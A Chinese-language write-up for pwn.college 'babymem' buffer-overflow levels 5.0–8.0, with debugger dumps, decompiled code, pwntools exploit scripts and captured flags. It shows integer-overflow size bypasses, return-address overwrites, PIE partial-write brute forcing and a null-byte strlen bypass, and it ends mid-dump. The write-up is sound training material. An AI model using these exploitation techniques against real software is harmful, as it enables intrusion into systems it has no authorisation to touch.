0x402938 <challenge+1370> mov rsi, rax 0x40293b <challenge+1373> lea rdi, [rip + 0x147e] RDI => 0x403dc0 ◂— 'ERROR: Failed to read input -- %s!\n' 0x402942 <challenge+1380> mov eax, 0 EAX => 0─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7ffd77ce34e0 ◂— 0xa /* '\n' */01:0008│-0a8 0x7ffd77ce34e8 —▸ 0x7ffd77ce46f8 —▸ 0x7ffd77ce55d8 ◂— 'MOTD_SHOWN=pam'02:0010│-0a0 0x7ffd77ce34f0 —▸ 0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0'03:0018│-098 0x7ffd77ce34f8 ◂— 0x10000000004:0020│-090 0x7ffd77ce3500 —▸ 0x7ffd77ce3520 ◂— 005:0028│-088 0x7ffd77ce3508 ◂— 0xffffffffffffffff06:0030│ rax rsi 0x7ffd77ce3510 ◂— 007:0038│-078 0x7ffd77ce3518 ◂— 0───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x40291c challenge+1342 1 0x402b32 main+198 2 0x796eb2aade08 3 0x796eb2aadecc __libc_start_main+140 4 0x4011fe _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> cContinuing.
Breakpoint 3, 0x0000000000402921 in challenge ()LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────*RAX 0xffffffffffffffff RBX 0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0'*RCX 0x796eb2b93c21 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */*RDX 0xffffffffffffff8813 collapsed lines
RDI 0 RSI 0x7ffd77ce3510 ◂— 0 R8 0x75 R9 0xffffffec R10 0*R11 0x246 R12 1 R13 0 R14 0x796eb2ce0000 (_rtld_global) —▸ 0x796eb2ce12e0 ◂— 0 R15 0 RBP 0x7ffd77ce3590 —▸ 0x7ffd77ce45c0 —▸ 0x7ffd77ce4660 —▸ 0x7ffd77ce46c0 ◂— 0 RSP 0x7ffd77ce34e0 ◂— 0xa /* '\n' */*RIP 0x402921 (challenge+1347) ◂— mov dword ptr [rbp - 0x14], eax────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── 0x40291c <challenge+1342> call read@plt <read@plt>
► 0x402921 <challenge+1347> mov dword ptr [rbp - 0x14], eax [0x7ffd77ce357c] => 0xffffffff 0x402924 <challenge+1350> cmp dword ptr [rbp - 0x14], 0 0xffffffff - 0x0 EFLAGS => 0x286 [ cf PF af zf SF IF df of ] 0x402928 <challenge+1354> jns challenge+1400 <challenge+1400>
0x40292a <challenge+1356> call __errno_location@plt <__errno_location@plt>
24 collapsed lines
0x40292f <challenge+1361> mov eax, dword ptr [rax] 0x402931 <challenge+1363> mov edi, eax 0x402933 <challenge+1365> call strerror@plt <strerror@plt>
0x402938 <challenge+1370> mov rsi, rax 0x40293b <challenge+1373> lea rdi, [rip + 0x147e] RDI => 0x403dc0 ◂— 'ERROR: Failed to read input -- %s!\n' 0x402942 <challenge+1380> mov eax, 0 EAX => 0─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7ffd77ce34e0 ◂— 0xa /* '\n' */01:0008│-0a8 0x7ffd77ce34e8 —▸ 0x7ffd77ce46f8 —▸ 0x7ffd77ce55d8 ◂— 'MOTD_SHOWN=pam'02:0010│-0a0 0x7ffd77ce34f0 —▸ 0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0'03:0018│-098 0x7ffd77ce34f8 ◂— 0x10000000004:0020│-090 0x7ffd77ce3500 —▸ 0x7ffd77ce3520 ◂— 005:0028│-088 0x7ffd77ce3508 ◂— 0xffffffffffffffff06:0030│ rsi 0x7ffd77ce3510 ◂— 007:0038│-078 0x7ffd77ce3518 ◂— 0───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x402921 challenge+1347 1 0x402b32 main+198 2 0x796eb2aade08 3 0x796eb2aadecc __libc_start_main+140 4 0x4011fe _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg>
查看 read
的定义,让我忍不住想吐槽这奇葩的设计:为了能够返回有符号数错误码,返回值类型被设置为 ssize_t
,但是可接收的最大输入值类型为 size_t
。显然 ssize_t < size_t
,也就是说我们提供的输入大小可能超出返回值(输入进去的数据的大小)的可承载范围,如果超出了就抛出 -1
。但又没有办法做到返回值类型和最大输入类型的匹配,如果返回值类型改成 size_t
就会出现错误码和输入大小混淆的问题;如果最大输入大小类型改成 ssize_t
// attributes: thunkssize_t read(int fd, void *buf, size_t nbytes){ return read(fd, buf, nbytes);}
言归正传,既然我们不能通过最方便的两个 -1
我们注意到在判断 v8 * v9 > 0x62
的时候做的都是 32 bits 运算:
► 0x40277d <challenge+927> mov edx, dword ptr [rbp - 0x88] EDX, [0x7ffcfb641768] => 0xffffffff 0x402783 <challenge+933> mov eax, dword ptr [rbp - 0x84] EAX, [0x7ffcfb64176c] => 0xffffffff 0x402789 <challenge+939> imul eax, edx 0x40278c <challenge+942> cmp eax, 0x62 0x1 - 0x62 EFLAGS => 0x297 [ CF PF AF zf SF IF df of ] 0x40278f <challenge+945> ✔ jbe challenge+978 <challenge+978>
两个 -1
行不通是因为它们相乘得到的无符号结果太大了,超出了 ssize_t
的可容纳范围。那有没有两个数可以在绕过 v8 * v9 > 0x62
且乘积的无符号表示大小不低于 144 的前提下又保证处于 ssize_t
如果我们提供的输入是 INT32_MAX
,或者 INT32_MIN
,和 2
,或其它任何满足 (v8 * v9) & 0xffffffff == 0x0
的一对数,就可以巧妙的绕过 v8 * v9 > 0x62
这用到了整数溢出的原理,INT32_MAX * 2
或者 INT32_MIN * 2
都会溢出到更高位,低位就变成 0 了。而我们在做判断的时候只使用了低 32 bits,不关心高位的情况,那么只要让低 32 bits 的大小小于等于 0x62
from pwn import context, ELF, process, remote, gdb, p64
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-5-0"HOST = "pwn.college"PORT = 1337
gdbscript = """b *challenge+927b *challenge+1326b *challenge+1342b *challenge+1347c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch(debug=False)
payload = b"".ljust(136, b"A") + p64(0x4022D7)
INT32_MAX = str((2**31)).encode()
target.recvuntil(b"Number of payload records to send: ")target.sendline(INT32_MAX)target.recvuntil(b"Size of each payload record: ")target.sendline(b"2")target.sendline(payload)
Flag: pwn.college{AcH-0L9UpmOONC81mhni9OzJVhD.01N5IDL5cTNxgzW}
Level 5.1
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!
18 collapsed lines
__int64 challenge(){ int *v0; // rax char *v1; // rax unsigned int v3; // [rsp+28h] [rbp-98h] BYREF unsigned int v4; // [rsp+2Ch] [rbp-94h] BYREF _QWORD v5[14]; // [rsp+30h] [rbp-90h] BYREF int v6; // [rsp+A0h] [rbp-20h] __int16 v7; // [rsp+A4h] [rbp-1Ch] char v8; // [rsp+A6h] [rbp-1Ah] int v9; // [rsp+ACh] [rbp-14h] size_t nbytes; // [rsp+B0h] [rbp-10h] void *buf; // [rsp+B8h] [rbp-8h]
memset(v5, 0, sizeof(v5)); v6 = 0; v7 = 0; v8 = 0; buf = v5; nbytes = 0LL; printf("Number of payload records to send: "); __isoc99_scanf("%u", &v4); if ( !v4 ) __assert_fail("record_num > 0", "/challenge/babymem-level-5-1.c", 0x49u, "challenge"); printf("Size of each payload record: "); __isoc99_scanf("%u", &v3); if ( !v3 ) __assert_fail("record_size > 0", "/challenge/babymem-level-5-1.c", 0x4Cu, "challenge"); if ( v3 * v4 > 0x77 ) __assert_fail("record_size * record_num <= 119", "/challenge/babymem-level-5-1.c", 0x4Du, "challenge"); nbytes = v3 * (unsigned __int64)v4; printf("Send your payload (up to %lu bytes)!\n", nbytes); v9 = read(0, buf, nbytes); if ( v9 < 0 ) { v0 = __errno_location();7 collapsed lines
v1 = strerror(*v0); printf("ERROR: Failed to read input -- %s!\n", v1); exit(1); } puts("Goodbye!"); return 0LL;}
不写了不写了,和上一题思路一样,自己去调试查 win
地址和 padding 大小就好啦~
from pwn import context, ELF, process, remote, gdb, p64
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-5-1"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch()
payload = b"".ljust(0x98, b"A") + p64(0x401A48)
INT32_MAX = str((2**31)).encode()
target.recvuntil(b"Number of payload records to send: ")target.sendline(INT32_MAX)target.recvuntil(b"Size of each payload record: ")target.sendline(b"2")target.sendline(payload)
Flag: pwn.college{A2rdZkIDLVjvpTrAPvlwpllVi7m.0FO5IDL5cTNxgzW}
Level 6.0
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!
4 collapsed lines
void __fastcall win_authed(int a1){ int *v1; // rax char *v2; // rax int *v3; // rax char *v4; // rax
if ( a1 == 0x1337 ) { puts("You win! Here is your flag:"); flag_fd_5715 = open("/flag", 0);24 collapsed lines
if ( flag_fd_5715 < 0 ) { v1 = __errno_location(); v2 = strerror(*v1); printf("\n ERROR: Failed to open the flag -- %s!\n", v2); if ( geteuid() ) { puts(" Your effective user id is not 0!"); puts(" You must directly run the suid binary in order to have the correct permissions!"); } exit(-1); } flag_length_5716 = read(flag_fd_5715, &flag_5714, 0x100uLL); if ( flag_length_5716 <= 0 ) { v3 = __errno_location(); v4 = strerror(*v3); printf("\n ERROR: Failed to read the flag -- %s!\n", v4); exit(-1); } write(1, &flag_5714, flag_length_5716); puts("\n"); }}
思路是覆盖返回地址,返回到 win_authed
。但是由于 win_authed
会先检查传入参数是否为 0x1337
,匹配才给 flag,所以我们光返回到 win_authed
还不够。要么想办法传入参数 0x1337
,要么返回到 if
void __fastcall win_authed(int a1){ if ( a1 == 0x1337 ) { /* ... */ }}
pwndbg> disass win_authedDump of assembler code for function win_authed:1 collapsed line
0x0000000000401987 <+0>: endbr64 0x000000000040198b <+4>: push rbp 0x000000000040198c <+5>: mov rbp,rsp 0x000000000040198f <+8>: sub rsp,0x10 0x0000000000401993 <+12>: mov DWORD PTR [rbp-0x4],edi 0x0000000000401996 <+15>: cmp DWORD PTR [rbp-0x4],0x1337 0x000000000040199d <+22>: jne 0x401aa1 <win_authed+282> 0x00000000004019a3 <+28>: lea rdi,[rip+0x1746] # 0x4030f0 0x00000000004019aa <+35>: call 0x401110 <puts@plt> 0x00000000004019af <+40>: mov esi,0x055 collapsed lines
0x00000000004019b4 <+45>: lea rdi,[rip+0x1751] # 0x40310c 0x00000000004019bb <+52>: mov eax,0x0 0x00000000004019c0 <+57>: call 0x401170 <open@plt> 0x00000000004019c5 <+62>: mov DWORD PTR [rip+0x4675],eax # 0x406040 <flag_fd.5715> 0x00000000004019cb <+68>: mov eax,DWORD PTR [rip+0x466f] # 0x406040 <flag_fd.5715> 0x00000000004019d1 <+74>: test eax,eax 0x00000000004019d3 <+76>: jns 0x401a22 <win_authed+155> 0x00000000004019d5 <+78>: call 0x401100 <__errno_location@plt> 0x00000000004019da <+83>: mov eax,DWORD PTR [rax] 0x00000000004019dc <+85>: mov edi,eax 0x00000000004019de <+87>: call 0x4011a0 <strerror@plt> 0x00000000004019e3 <+92>: mov rsi,rax 0x00000000004019e6 <+95>: lea rdi,[rip+0x172b] # 0x403118 0x00000000004019ed <+102>: mov eax,0x0 0x00000000004019f2 <+107>: call 0x401130 <printf@plt> 0x00000000004019f7 <+112>: call 0x401140 <geteuid@plt> 0x00000000004019fc <+117>: test eax,eax 0x00000000004019fe <+119>: je 0x401a18 <win_authed+145> 0x0000000000401a00 <+121>: lea rdi,[rip+0x1741] # 0x403148 0x0000000000401a07 <+128>: call 0x401110 <puts@plt> 0x0000000000401a0c <+133>: lea rdi,[rip+0x175d] # 0x403170 0x0000000000401a13 <+140>: call 0x401110 <puts@plt> 0x0000000000401a18 <+145>: mov edi,0xffffffff 0x0000000000401a1d <+150>: call 0x401190 <exit@plt> 0x0000000000401a22 <+155>: mov eax,DWORD PTR [rip+0x4618] # 0x406040 <flag_fd.5715> 0x0000000000401a28 <+161>: mov edx,0x100 0x0000000000401a2d <+166>: lea rsi,[rip+0x462c] # 0x406060 <flag.5714> 0x0000000000401a34 <+173>: mov edi,eax 0x0000000000401a36 <+175>: call 0x401150 <read@plt> 0x0000000000401a3b <+180>: mov DWORD PTR [rip+0x471f],eax # 0x406160 <flag_length.5716> 0x0000000000401a41 <+186>: mov eax,DWORD PTR [rip+0x4719] # 0x406160 <flag_length.5716> 0x0000000000401a47 <+192>: test eax,eax 0x0000000000401a49 <+194>: jg 0x401a77 <win_authed+240> 0x0000000000401a4b <+196>: call 0x401100 <__errno_location@plt> 0x0000000000401a50 <+201>: mov eax,DWORD PTR [rax] 0x0000000000401a52 <+203>: mov edi,eax 0x0000000000401a54 <+205>: call 0x4011a0 <strerror@plt> 0x0000000000401a59 <+210>: mov rsi,rax 0x0000000000401a5c <+213>: lea rdi,[rip+0x1765] # 0x4031c8 0x0000000000401a63 <+220>: mov eax,0x0 0x0000000000401a68 <+225>: call 0x401130 <printf@plt> 0x0000000000401a6d <+230>: mov edi,0xffffffff 0x0000000000401a72 <+235>: call 0x401190 <exit@plt> 0x0000000000401a77 <+240>: mov eax,DWORD PTR [rip+0x46e3] # 0x406160 <flag_length.5716> 0x0000000000401a7d <+246>: cdqe 0x0000000000401a7f <+248>: mov rdx,rax 0x0000000000401a82 <+251>: lea rsi,[rip+0x45d7] # 0x406060 <flag.5714> 0x0000000000401a89 <+258>: mov edi,0x1 0x0000000000401a8e <+263>: call 0x401120 <write@plt> 0x0000000000401a93 <+268>: lea rdi,[rip+0x1758] # 0x4031f2 0x0000000000401a9a <+275>: call 0x401110 <puts@plt> 0x0000000000401a9f <+280>: jmp 0x401aa2 <win_authed+283> 0x0000000000401aa1 <+282>: nop 0x0000000000401aa2 <+283>: leave 0x0000000000401aa3 <+284>: retEnd of assembler dump.pwndbg>
from pwn import context, ELF, process, remote, gdb, p64
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-6-0"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch()
payload = b"".ljust(0x58, b"A") + p64(0x4019A3)payload_size = str(len(payload)).encode()
target.recvuntil(b"Payload size: ")target.sendline(payload_size)target.recvuntil("Send your payload")target.send(payload)
Flag: pwn.college{AusQ-DCHaivq4M4Tj9IZIsDv7m8.0VO5IDL5cTNxgzW}
Level 6.1
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!
和上一题一样,只是需要计算一下 padding 大小和看一下返回到哪里,这里就不多赘述了。
from pwn import context, ELF, process, remote, gdb, p64
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-6-1"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch()
payload = b"".ljust(0x88, b"A") + p64(0x401DB0)payload_size = str(len(payload)).encode()
target.recvuntil(b"Payload size: ")target.sendline(payload_size)target.recvuntil("Send your payload")target.send(payload)
Flag: pwn.college{Mlgp6gl7Ogp1vkjstLEXXOSldEM.0FMwMDL5cTNxgzW}
Level 7.0
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary!
这题和前两题差不多,都是计算 padding 和覆盖返回地址,唯一的区别在于它启用了 PIE 保护,导致我们无法知道确切的返回地址。这里我们通过 Partial Write
的方式绕过 PIE。
Partial Write
利用了操作系统加载程序时总是将程序加载到随机的内存页,通常内存页是 0x1000
字节,4 KB 对齐的,也就是说程序内部指令的偏移量都不可能超出这个范围,不够就分配到下一个内存页,比如 0x2000
。所以开启了 PIE 的程序,尽管每次运行都被分配到不同的内存页,但它们在内存页中的偏移地址,也就是最后 3 nibbles 始终是相同的。利用这一点,我们只需要覆盖这最后 3 nibbles 即可达到控制返回地址的效果。
但由于我们没办法写入半个字节,所以我们需要猜一个 nibble,范围是 [0x0, 0xf]
。将它和固定的 3 nibbles 组合输入到程序,如果地址匹配就成功跳转了。
下面看看开启 PIE 后的效果(每次运行都会随机分配基地址,但最后 3 nibbles 偏移地址始终是固定的)。
Run 1:
pwndbg> piebaseCalculated VA from /home/cub3y0nd/Projects/pwn.college/babymem-level-7-0 = 0x6123056c8000pwndbg> i fun mainAll functions matching regular expression "main":
Non-debugging symbols:0x00006123056ca3c3 main0x00007149f9ca4e40 __libc_start_main0x00007149f9cb4b70 bindtextdomain0x00007149f9cb4bb0 bind_textdomain_codeset0x00007149f9cb86b0 textdomain0x00007149f9d026c0 _IO_switch_to_main_wget_area0x00007149f9d8e0b0 getdomainname0x00007149f9d95d00 setdomainname0x00007149f9da4b90 __getdomainname_chk0x00007149f9db6940 __res_nquerydomain0x00007149f9db6940 res_nquerydomain0x00007149f9db69f0 __res_querydomain0x00007149f9db69f0 res_querydomainpwndbg> i fun challengeAll functions matching regular expression "challenge":
Non-debugging symbols:0x00006123056c9d0b challengepwndbg> i fun win_authedAll functions matching regular expression "win_authed":
Non-debugging symbols:0x00006123056c9bee win_authedpwndbg>
Run 2:
pwndbg> piebaseCalculated VA from /home/cub3y0nd/Projects/pwn.college/babymem-level-7-0 = 0x622fffad3000pwndbg> i fun mainAll functions matching regular expression "main":
Non-debugging symbols:0x0000622fffad53c3 main0x0000781a2c3f4e40 __libc_start_main0x0000781a2c404b70 bindtextdomain0x0000781a2c404bb0 bind_textdomain_codeset0x0000781a2c4086b0 textdomain0x0000781a2c4526c0 _IO_switch_to_main_wget_area0x0000781a2c4de0b0 getdomainname0x0000781a2c4e5d00 setdomainname0x0000781a2c4f4b90 __getdomainname_chk0x0000781a2c506940 __res_nquerydomain0x0000781a2c506940 res_nquerydomain0x0000781a2c5069f0 __res_querydomain0x0000781a2c5069f0 res_querydomainpwndbg> i fun challengeAll functions matching regular expression "challenge":
Non-debugging symbols:0x0000622fffad4d0b challengepwndbg> i fun win_authedAll functions matching regular expression "win_authed":
Non-debugging symbols:0x0000622fffad4bee win_authedpwndbg>
from pwn import context, ELF, log, pause, process, random, remote, gdb
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-7-0"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
padding_size = 0x38fixed_offset = b"\x0a"possible_bytes = [bytes([i]) for i in range(0x0C, 0x10C, 0x10)]
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode() target.recvuntil(b"Payload size: ") target.sendline(payload_size) target.recvuntil(b"Send your payload") target.send(payload)
response = target.recvall()
return b"You win!" in response except Exception as e: log.exception(f"An error occurred: {e}")
return False
while True: try: target = launch()
payload = b"A" * padding_size payload += fixed_offset + random.choice(possible_bytes) log.info(f"Trying payload: {payload.hex()}")
if send_payload(target, payload): log.success("Success! Exiting...")
pause() exit() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
Flag: pwn.college{0svlAHsYG0L-ONps0VQ3ssICrbb.0VMwMDL5cTNxgzW}
Level 7.1
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary!
from pwn import context, ELF, log, pause, process, random, remote, gdb
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-7-1"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
padding_size = 0x88fixed_offset = b"\x3d"possible_bytes = [bytes([i]) for i in range(0x08, 0x108, 0x10)]
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode() target.recvuntil(b"Payload size: ") target.sendline(payload_size) target.recvuntil(b"Send your payload") target.send(payload)
response = target.recvall()
return b"You win!" in response except Exception as e: log.exception(f"An error occurred: {e}")
while True: try: target = launch()
payload = b"A" * padding_size payload += fixed_offset + random.choice(possible_bytes) log.info(f"Trying payload: {payload.hex()}")
if send_payload(target, payload): log.success("Success! Exiting...")
pause() exit() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
Flag: pwn.college{EC4bj1hO9Oo1kCMvjnoAdmOg2ed.0lMwMDL5cTNxgzW}
Level 8.0
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary with an additional check on your input.
4 collapsed lines
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3){ int *v3; // rax char *v4; // rax _QWORD v6[3]; // [rsp+0h] [rbp-80h] BYREF int v7; // [rsp+1Ch] [rbp-64h] size_t size; // [rsp+28h] [rbp-58h] BYREF _QWORD v9[4]; // [rsp+30h] [rbp-50h] BYREF int v10; // [rsp+50h] [rbp-30h] char v11; // [rsp+54h] [rbp-2Ch] size_t v12; // [rsp+60h] [rbp-20h]9 collapsed lines
int v13; // [rsp+6Ch] [rbp-14h] void *buf; // [rsp+70h] [rbp-10h] void *dest; // [rsp+78h] [rbp-8h] __int64 savedregs; // [rsp+80h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+88h] [rbp+8h] BYREF
v7 = a1; v6[2] = a2; v6[1] = a3; memset(v9, 0, sizeof(v9)); v10 = 0; v11 = 0; dest = v9; size = 0LL; puts("The challenge() function has just been launched!"); sp_ = (__int64)v6;81 collapsed lines
bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2; rp_ = (__int64)&retaddr; puts("Before we do anything, let's take a look at challenge()'s stack frame:"); DUMP_STACK(sp_, sz_); printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_); printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_); puts("including the saved base pointer and the saved return address, for a"); printf("total of %d bytes.\n", 8 * sz_); printf("The input buffer begins at %p, partway through the stack frame,\n", dest); puts("(\"above\" it in the stack are other local variables used by the function)."); puts("Your input will be read into this buffer."); printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 37); puts("large input length, and thus overflow the buffer.\n"); puts("In this level, there is no \"win\" variable."); puts("You will need to force the program to execute the win_authed() function"); puts("by directly overflowing into the stored return address back to main,"); printf( "which is stored at %p, %d bytes after the start of your input buffer.\n", (const void *)rp_, rp_ - (_DWORD)dest); printf( "That means that you will need to input at least %d bytes (%d to fill the buffer,\n", rp_ - (_DWORD)dest + 8, 37); printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)dest - 37); puts("and 8 that will overwrite the return address).\n"); puts("We have disabled the following standard memory corruption mitigations for this challenge:"); puts("- the canary is disabled, otherwise you would corrupt it before"); puts("overwriting the return address, and the program would abort."); puts("Because the binary is position independent, you cannot know"); puts("exactly where the win_authed() function is located."); puts("This means that it is not clear what should be written into the return address.\n"); printf("Payload size: "); __isoc99_scanf("%lu", &size); printf("You have chosen to send %lu bytes of input!\n", size); printf("This will allow you to write from %p (the start of the input buffer)\n", dest); printf( "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", (char *)dest + size, size - 37); printf("Of these, you will overwrite %d bytes into the return address.\n", size + (_DWORD)dest - rp_); puts("If that number is greater than 8, you will overwrite the entire return address.\n"); puts("Overwriting the entire return address is fine when we know"); puts("the whole address, but here, we only really know the last three nibbles."); puts("These nibbles never change, because pages are aligned to 0x1000."); puts("This gives us a workaround: we can overwrite the least significant byte"); puts("of the saved return address, which we can know from debugging the binary,"); puts("to retarget the return to main to any instruction that shares the other 7 bytes."); puts("Since that last byte will be constant between executions (due to page alignment),"); puts("this will always work."); puts("If the address we want to redirect execution to is a bit farther away from"); puts("the saved return address, and we need to write two bytes, then one of those"); puts("nibbles (the fourth least-significant one) will be a guess, and it will be"); puts("incorrect 15 of 16 times."); puts("This is okay: we can just run our exploit a few times until it works"); puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times)."); puts("One caveat in this challenge is that the win_authed() function must first auth:"); puts("it only lets you win if you provide it with the argument 0x1337."); puts("Speifically, the win_authed() function looks something like:"); puts(" void win_authed(int token)"); puts(" {"); puts(" if (token != 0x1337) return;"); puts(" puts(\"You win! Here is your flag: \");"); puts(" sendfile(1, open(\"/flag\", 0), 0, 256);"); puts(" puts(\"\");"); puts(" }"); puts(byte_3F3B); puts("So how do you pass the check? There *is* a way, and we will cover it later,"); puts("but for now, we will simply bypass it! You can overwrite the return address"); puts("with *any* value (as long as it points to executable code), not just the start"); puts("of functions. Let's overwrite past the token check in win!\n"); puts("To do this, we will need to analyze the program with objdump, identify where"); puts("the check is in the win_authed() function, find the address right after the check,"); puts("and write that address over the saved return address.\n"); puts("Go ahead and find this address now. When you're ready, input a buffer overflow"); printf( "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n", (const void *)rp_, rp_ - (_DWORD)dest); puts("with the correct value.\n"); puts("This challenge is careful about reading your input: it will allocate a correctly-sized temporary"); puts("buffer on the heap, and then copy the data over to the stack. Can you figure out a way to fool"); puts("this technique and cause an overflow?"); buf = malloc(size); if ( !buf ) __assert_fail("tmp_input != 0", "/challenge/babymem-level-8-0.c", 0xC0u, "challenge"); printf("Send your payload (up to %lu bytes)!\n", size); v13 = read(0, buf, size); puts("Checking length of received string..."); v12 = strlen((const char *)buf); if ( v12 > 0x24 ) __assert_fail("string_length < 37", "/challenge/babymem-level-8-0.c", 0xC5u, "challenge"); printf( "Passed! We should have enough space for all %d bytes of it on the stack. Copying all %d received bytes!\n", v12, v13); memcpy(dest, buf, v13); if ( v13 < 0 ) { v3 = __errno_location();28 collapsed lines
v4 = strerror(*v3); printf("ERROR: Failed to read input -- %s!\n", v4); exit(1); } printf("You sent %d bytes!\n", v13); puts("Let's see what happened with the stack:\n"); DUMP_STACK(sp_, sz_); puts("The program's memory status:"); printf("- the input buffer starts at %p\n", dest); printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_); printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_); printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_); printf("- the address of win_authed() is %p.\n", win_authed); putchar(10); puts("If you have managed to overwrite the return address with the correct value,"); puts("challenge() will jump straight to win_authed() when it returns."); printf("Let's try it now!\n\n"); if ( (unsigned __int64)dest + v13 > rp_ + 2 ) { puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address."); puts(" This can still work, because I told you the correct address to use for"); puts(" this execution, but you should not rely on that information."); puts(" You can solve this challenge by only overwriting two bytes!"); puts(" "); } puts("Goodbye!"); return 0LL;}
我们知道 memcpy
会把我们输入的数据从 buf
复制到 dest
,具体复制多少是根据 v13
,也就是 read
到的大小决定的,那这就存在了缓冲出溢出问题了。所以思路是我们利用 memcpy
内存我们正常分配就好,这里主要是得设法绕过 v12 > 0x24
,也就是 payload 不能大于 36 bytes,很显然这是不现实的,覆盖返回段地址至少要 0x58 bytes。
注意到判断输入长度的函数是 strlen
。这个函数根据 Null 字符 \x00
判断字符串是否结束。那么,如果我们在 payload 一开始就写一个 Null 字符,strlen
19 collapsed lines
Breakpoint 1, 0x000055555555622f in challenge ()LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────── RAX 0x7fffffffd160 ◂— 0 RBX 0x7fffffffe308 —▸ 0x7fffffffe6ba ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-8-0' RCX 0x55555555b2a0 ◂— 0xa /* '\n' */ RDX 1 RDI 0x7fffffffd160 ◂— 0 RSI 0x55555555b2a0 ◂— 0xa /* '\n' */ R8 0x64 R9 0xffffffff R10 0 R11 0x202 R12 1 R13 0 R14 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f R15 0 RBP 0x7fffffffd1b0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0 RSP 0x7fffffffd130 —▸ 0x7fffffffd160 ◂— 0 RIP 0x55555555622f (challenge+1522) ◂— call 0x5555555551d0────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── ► 0x55555555622f <challenge+1522> call memcpy@plt <memcpy@plt> dest: 0x7fffffffd160 ◂— 0 src: 0x55555555b2a0 